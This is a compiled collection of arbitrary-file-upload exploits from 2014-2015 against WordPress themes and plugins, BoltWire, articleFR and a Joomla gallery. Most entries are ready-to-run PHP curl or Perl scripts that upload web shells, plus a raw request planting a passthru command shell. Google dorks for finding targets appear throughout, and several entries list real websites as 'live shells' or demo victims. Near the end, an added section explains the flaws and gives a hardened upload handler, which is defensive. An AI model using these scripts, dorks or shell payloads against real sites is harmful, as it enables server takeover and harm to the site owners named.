Arbitrary File Upload Vulnerability Exploits

     
    2014-2015

    Wordpress Frontend Upload Plugin - Arbitrary File Upload Vulnerability
    Code:
    # Exploit Title: Frontend Upload Wordpress Plugin - File Arbitrary Upload
    # Date: 10/02/2014
    # Author: Daniel Godoy
    # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
    # Author Web: www.delincuentedigital.com.ar
    # Software: Frontend Upload
    # http://codecanyon.net/item/frontend-upload/6076410?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=gtPlugins
    # Tested on: Linux
    [Comment]Greetz: Ariel Orellana, TrustedBSD, Sunplace www.remoteexecution.net www.remoteexcution.com.ar
      
    [PoC]
      
    You can upload files with a PHP extension, for example c99.php, shell.gif.php, etc.
      
    http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php
      
    -------------------------
    Email sent via MailMonstruo - www.mailmonstruo.com

    Wordpress Themify Arbitrary File Upload Vulnerability
    Code:
    #Title : Wordpress Themify Arbitrary File Upload Vulnerability
    #Author : Jje Incovers
    #Date : 31/03/2014
    #Category : Web Applications
    #Type : TXT, PHP, HTML, HTM, ASP, Etc.
    #Vendor : http://themify.me/
    #Download : http://themify.me/themes
    #Tested : Mozilla, Chrome, Opera -> Windows & Linux
    #Vulnerability : File Upload
    #Scanning Theme : [ Flatshop, Magazine , Flat Flat , Parallax , Bold, Metro , Pinshop , Agency , Slide , Postline , Fullscreen , Pinboard , Shopo , Minshop , Notes , ShopDock , PhotoTouch , Basic , Responz , Simfo , Grido , Tisa , Suco , Elemin , Folo , Funki , Minblr , iTheme2 , Newsy , Wumblr , Rezo , Photobox , Edmin , Koi , Bizco , ThemeMin , Wigi , Blogfolio , Sidepane , Bloggie ]
     
    #Dork :
    inurl:"/wp-content/themes/Elemin/"
    inurl:"/wp-content/themes/Bloggie/"
    inurl:"/wp-content/themes/Tisa/"
    inurl:"/wp-content/themes/Funki/"
    inurl:"/wp-content/themes/Pinboard/"
    inurl:"/wp-content/themes/FOlo/"
    inurl:"/wp-content/themes/grido/"
    inurl:"/wp-content/themes/Suco/"
    inurl:"/wp-content/themes/iThemes2/"
     
    Arbitrary File Upload
     
    Exploit : /wp-content/themes/select a theme/themify/themify-ajax.php
     
    Example :
     
    Elemin theme :
    http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php
     
    Script :
     
    <?php
    $uploadfile="inc0vers.php";
    $ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    Shell Access :
     
    http://yourtarget.com/wp-content/themes/select a theme/uploads/your file
     
    Example :
     
    Elemin theme :
    http://yourtarget.com/wp-content/themes/elemin/uploads/inc0vers.php
     
    Note :
    Change the theme in the script to match your dork!!

    WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability
    Code:
    Google Dork => inurl:/wp-content/plugins/image-symlinks/
    Usage info:
    => Exploit Info :

    The attacker can upload file/shell.php

    ("php") // Allowed file extensions

    "/uploadify/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
    #=> Exploit  :

    <?php
    $uploadfile="Bruno.php";
    $ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
                  array('Filedata'=>"@$uploadfile",
                  'folder'=>'/wp-content/plugins/image-symlinks/uploadify/'));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
     
    Shell Access :   http://localhost/wp-content/image-symlinks/uploadify/random_name.php
     
     
    <?php
    phpinfo();
    ?>
     
     
    ====================================
     
    Examples  :  ( Live Shells ) 
     
    1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php
     
    2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php
     
     
    3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php
    BoltWire 4.10 Arbitrary File Upload Vulnerability
    Code:
    A vulnerability in BoltWire can be exploited to execute arbitrary PHP code on the target system and gain complete control over the vulnerable web application.
     
     
    1) Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169
     
    The vulnerability exists due to insufficient validation of the filename when uploading files in the "/index.php" script. A remote authenticated attacker can upload an arbitrary file with a ".txt" extension and rename it to ".php" using a specially crafted HTTP POST request. Successful exploitation requires valid user credentials, but registration is open by default to anyone. The vulnerability allows execution of arbitrary PHP code with the privileges of the webserver and can lead to complete compromise of the website.
     
    The following dump of the HTTP POST request illustrates the upload of the file named "file.txt" and its renaming into "file.php", with contents, which allows execution of arbitrary system commands:
     
    POST /index.php?p=action.upload HTTP/1.1
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------312591666129281
    Content-Length: 538
     
    -----------------------------312591666129281
    Content-Disposition: form-data; name="boltkey"
     
    9867614
    -----------------------------312591666129281
    Content-Disposition: form-data; name="upload"; filename="file.txt"
    Content-Type: text/plain

    <?
    passthru($_GET['cmd']);
    ?>


    -----------------------------312591666129281
    Content-Disposition: form-data; name="filename"

    file.php
    -----------------------------312591666129281
    Content-Disposition: form-data; name="submit"
     
    UPLOAD
    -----------------------------312591666129281--
     
    The uploaded file will be accessible using the following URL:
     
    http://[host]/files/file.php?cmd=ls
     
    Solution:
    Update to BoltWire 4.11
     
    More Information:
    http://www.boltwire.com/index.php?p=downloads
    WordPress Theme Konzept Arbitrary File Upload Vulnerability
    Code:
    Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability
     
    Exploit Author : NULL_Pointer
     
    Contact : https://www.facebook.com/xenith.gianni
     
    Date : 19/09/2014
     
    Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept
     
    Version: 1.0
     
    Google Dork : inurl:/wp-content/themes/konzept/
     
    Tested on : Linux, Windows 7
     
    --------------------------------------------------------------
     
    WordPress Theme Konzept suffers from an Arbitrary File Upload Vulnerability.
     
    Exploit :
     
    <?php
     
    $url = "http://127.0.0.1"; // put URL Here
    $post = array
    (
            "file" => "@null_pointer.jpg",
            "name" => "null_pointer.php"
    );
     
    $ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_POST, 1);
    @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch);
    curl_close ($ch);
     
    echo $data;
     
    ?>
     
    Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php
     
    Proof Video : http://www.youtube.com/watch?v=g7RaR3bCMag
     
    Demo Sites :
     
    http://www.ladepro.fr
    http://getawayproductions.fr
    http://www.victor-remere.fr
    http://www.biceps-graphicdesign.fr
     
    articleFR CMS 3.0.5 Arbitrary File Upload Vulnerability
    Code:
    #Vulnerability title: Arbitrary File Upload in articleFR CMS 3.0.5
    #Product: articleFR CMS
    #Vendor: http://freereprintables.com
    #Affected version: version 3.0.5 
    #Download link: https://github.com/articlefr/articleFR
    #Fixed version: N/A
    #Author: Tran Dinh Tien ([email protected]) & ITAS Team (www.itas.vn)
     
     
    ::DESCRIPTION::
    - Vulnerabilities related to the upload of unexpected file types are unique in that the upload should quickly reject a file if it does not have a specific extension. Additionally, this is different from uploading malicious files in that in most cases an incorrect file format may not by itself be inherently "malicious" but may be detrimental to the saved data.
    - The application may be expecting only certain file types to be uploaded for processing, such as mpeg4, ogv, ogg, 3gp, webm, gif, mkv, flv, drc, mng, avi,... files. The application may not validate the uploaded file by extension (for low assurance file validation) or content (high assurance file validation).
     
     
     
    ::PROOF OF CONCEPT::
     
    - REQUEST:
     
    POST /articlefr/dashboard/videouploader.php HTTP/1.1
    Host: target.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Referer: http://target.org/articlefr/dashboard/videos/fileupload/
    Content-Length: 414
    Content-Type: multipart/form-data; boundary=---------------------------277651700022570
    Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
     
    -----------------------------277651700022570
    Content-Disposition: form-data; name="myVideo"; filename="img.php"
    Content-Type: image/gif
     
    <?php 
    phpinfo(); 
    ?>
    -----------------------------277651700022570
    Content-Disposition: form-data; name=""
     
    undefined
    -----------------------------277651700022570
    Content-Disposition: form-data; name=""
     
    undefined
    -----------------------------277651700022570--
     
     
     
    - RESPONSE:
     
    HTTP/1.1 200 OK
    Date: Mon, 22 Dec 2014 03:10:30 GMT
    Server: Apache/2.2.15 (Red Hat)
    Content-Type: text/html
    Vary: Accept-Encoding
    Accept-Ranges: none
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Content-Length: 36
     
    [String_Random].php
     
    - Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
     
     
    - Vulnerable file: articlefr/dashboard/videouploader.php
     
    - Vulnerable code:
     
    <?php
    $output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
    if(isset($_FILES["myVideo"]))
    {
      $ret = array();

      $error =$_FILES["myVideo"]["error"];

      if(!is_array($_FILES["myVideo"]["name"]))
      {
          $fileName = $_FILES["myVideo"]["name"];
          $extension = pathinfo($fileName, PATHINFO_EXTENSION);
          $newFileName = md5(uniqid() . $fileName) . '.' . $extension;

          move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
          $ret[]= $newFileName;
      }

      echo $newFileName;
    }
    ?>
     
      
      
      
    ::DISCLOSURE::
    + 12/09/2014: Contact to vendor - vendor did not reply
    + 12/11/2014: Contact to vendor - vendor did not reply
    + 12/22/2014: Contact to vendor - vendor replied
    + 12/23/2014: Send the detail vulnerability to vendor - vendor did not reply
    + 01/21/2015: Public information
     
     
    ::REFERENCE::
    - http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html
     
    Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability
    # Source: https://github.com/heyjoeb/fenix/tree/master/wp-content/themes/holding_pattern
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/holding_pattern
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/holding_pattern/admin/shell.php
     
    Wordpress Theme Charity Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme Charity Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/Charity-Theme
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/charity
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/charity/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/charity/admin/shell.php
     
    Wordpress Theme SimpleCart Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme SimpleCart Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/SimpleCart-Theme
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/simpleCart
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/simpleCart/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/simpleCart/admin/shell.php
     
    Wordpress Theme Micro Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme Micro Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/Micro-Theme
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/micro
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/micro/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/micro/admin/shell.php

    Wordpress Theme Evo Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme Evo Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/Evo-Theme
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/evo
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/evo/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/evo/admin/shell.php
     
      
    Wordpress Theme Gallery pro Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme Gallery pro Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/Gallery-Pro-Theme
    # Author: terrorist
    # Email: [email protected]
    # Team: GHC - Georgian Hacking Community
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/gallery
    #########################################################
      
    # Vulnerable upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
             
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    # Exploit
    <?php
    $uploadfile="shell.php";
    $target = "http://target.com";
    $domain = explode("/", $target);
    $server_addr = gethostbyname($domain[2]);
    $ch = curl_init($target."/wp-content/themes/gallery/admin/upload-file.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
     
    # File path: http://target/wp-content/themes/gallery/admin/shell.php
     
     
    WordPress Fusion 3.1 Arbitrary File Upload Vulnerability
    Code:
    ------------------------------------------------------------------------------
    WordPress Fusion Theme Authenticated Arbitrary File Upload
    ------------------------------------------------------------------------------
     
     
    [-] Theme Link:
     
    https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
    http://digitalnature.ro/themes/fusion/
     
    [-] Affected Version:
     
    Version 3.1
     
     
    [-] Vulnerability Description:
     
    The vulnerable code is located in the /functions script:
    //SHORTENED CODE
     
    function fusion_options() {
     
      if ( 'fusion_save' == $_REQUEST['action'] ) {
        if ($_FILES["file-logo"]["type"]){
         $directory = $uploadpath['basedir'].'/';
         move_uploaded_file($_FILES["file-logo"]["tmp_name"],
         $directory . $_FILES["file-logo"]["name"]);
         update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
    $_FILES["file-logo"]["name"]);
        }
     
    }
    add_action('admin_menu', 'fusion_options');
     
     
    The function fusion_options can then be called and executed by LOGGED IN USERS,
    which allows uploading any file to the attacked server and may lead to a
    full takeover of the site.
     
     
    [-] Proof of Concept:
     
    <form action="http://localhost/x/wordpress/wp-admin/admin.php"
    method="post" enctype="multipart/form-data">
            <input type="file" name="file-logo" />
            <input type="hidden" name="action" value="fusion_save" />
            <button type="submit" >Upload</button>
    </form>
     
    Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
    Code:
    #########################################################
    # Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
    # Source: https://github.com/UpThemes/DesignFolio-Plus
    # Author: CrashBandicot
    # Email: [email protected]
    # Category: webapps/php
    # Google dork: inurl:wp-content/themes/DesignFolio-Plus
    #########################################################
     
    Vulnerable File : upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
              
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    Exploit
     
    #!/usr/bin/perl
     
    use Digest::MD5 qw(md5 md5_hex);
    use MIME::Base64;
    use IO::Socket;
    use LWP::UserAgent;
     
        system(($^O eq 'MSWin32') ? 'cls' : 'clear');
            print "\n\t     ! *** #  ^_^ # *** !\n\t      :p\n\n";
     
    $use = "\n\t  [!] ./$0 127.0.0.1 backdoor.php";
     
    ($target ,$file) = @ARGV;
     
    die "$use" unless $ARGV[0] && $ARGV[1];
     
    if($target =~ /http:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
     
    my $addr = inet_ntoa((gethostbyname($target))[4]);
    my $digest = md5_hex($addr);
    my $dir = encode_base64('../../../../');
     
    my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
    $pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
    if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
     
    __END__
     
     
    # File path: http://target/shell.php
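The upload handlers quoted on this page fail in the same few ways. videouploader.php (articleFR) and the uploadify.php endpoints keep whatever extension the client sends; the upload-file.php shipped with the UpThemes and DesignFolio+ themes takes its destination directory from a base64-encoded request parameter, treats md5($_SERVER['SERVER_ADDR']) as a secret although the server's address is public, performs no authorisation and chmods the result to 0777; BoltWire lets the caller rename a .txt upload to .php; and the Fusion theme trusts the client-supplied $_FILES[...]['type'] and runs its upload for any logged-in user. The handler below is an added example written for this page, not code from any of those projects. It checks capability and nonce before touching the upload, derives the type from the file's bytes with finfo and assigns the extension from an allowlist, confines the destination with realpath, and stores the file under a random server-chosen name with 0644 permissions. The names secure_upload, ALLOWED_TYPES and MAX_BYTES are this example's own; myVideo and videos_repository are reused from the articleFR listing; current_user_can() and check_admin_referer() are WordPress core functions, so the entry point assumes it runs inside WordPress.

```php
<?php
// Added example for this page, not code from articleFR, BoltWire, Fusion or any
// UpThemes/DesignFolio theme. Names below (secure_upload, ALLOWED_TYPES, MAX_BYTES)
// are this example's own; myVideo and videos_repository come from the articleFR listing.
declare(strict_types=1);

// Allowlist: the extension the server will assign, keyed by the MIME type that
// libmagic must report for the file's bytes. The client's filename, its extension
// and its Content-Type header ($_FILES[...]['type'], which Fusion trusts) play no part.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'video/mp4'  => 'mp4',
    'video/webm' => 'webm',
];
const MAX_BYTES = 10 * 1024 * 1024;

/**
 * Validate one entry of $_FILES and store it under $base_dir/$sub_dir.
 * Returns the server-chosen filename; throws RuntimeException on any policy failure.
 */
function secure_upload(array $file, string $base_dir, string $sub_dir = ''): string
{
    // 1. A real upload that arrived without error, within the size cap.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected: transport error');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('rejected: too large');
    }

    // 2. Type from content. img.php sent as "image/gif" (articleFR PoC) is text/x-php here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException("rejected: content type '$mime' not allowed");
    }
    $ext = ALLOWED_TYPES[$mime];

    // 3. Destination confined to $base_dir after resolving ".." and symlinks, which
    //    closes the upload_path / jpath traversal used against upload-file.php.
    $base = realpath($base_dir);
    $dest = realpath($base_dir . '/' . $sub_dir);
    if ($base === false || $dest === false
        || strncmp($dest . '/', $base . '/', strlen($base) + 1) !== 0) {
        throw new RuntimeException('rejected: destination outside upload root');
    }

    // 4. Random server-chosen name; no client-supplied text reaches the filesystem,
    //    so there is nothing to rename to .php (the BoltWire case) either.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = $dest . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $path)) {
        throw new RuntimeException('move failed');
    }
    chmod($path, 0644);   // readable, never writable by others, never executable
    return $name;
}

// Entry point. Authorisation comes before any parsing of the upload; this part assumes
// it runs inside WordPress, where current_user_can() and check_admin_referer() exist.
if (isset($_FILES['myVideo'])) {
    if (!current_user_can('upload_files')) {
        http_response_code(403);
        exit('forbidden');
    }
    check_admin_referer('secure_upload_action');   // dies on a missing or stale nonce
    try {
        echo secure_upload($_FILES['myVideo'], __DIR__ . '/../videos_repository');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

Validation in the handler is one layer; the second is making the upload directory unable to execute anything even if a .php file does land there, for example an Apache `<FilesMatch "\.ph(p[0-9]?|tml|ar)$">` block with `Require all denied` in that directory, or an nginx `location` for the uploads path that returns 403 for `.php` requests. Keeping the directory outside the webroot and serving files through a read-only download script removes the problem entirely.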
     
    Joomla Simple Photo Gallery - Arbitrary File Upload Vulnerability
    Code:
    ######################################################################
    # Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
    # Google Dork: inurl:com_simplephotogallery
    # Date: 10.03.2015
    # Exploit Author: CrashBandicot @DosPerl
    # My Github: github.com/CCrashBandicot
    # Vendor Homepage: https://www.apptha.com/
    # Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
    # Version: 1
    # Tested on: Windows
    ######################################################################
     
    # Vulnerable File : uploadFile.php
    # Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
     
    20.   $fieldName = 'uploadfile';
    87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
    94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
    96.      if(! move_uploaded_file($fileTemp, $uploadPath))
     
     
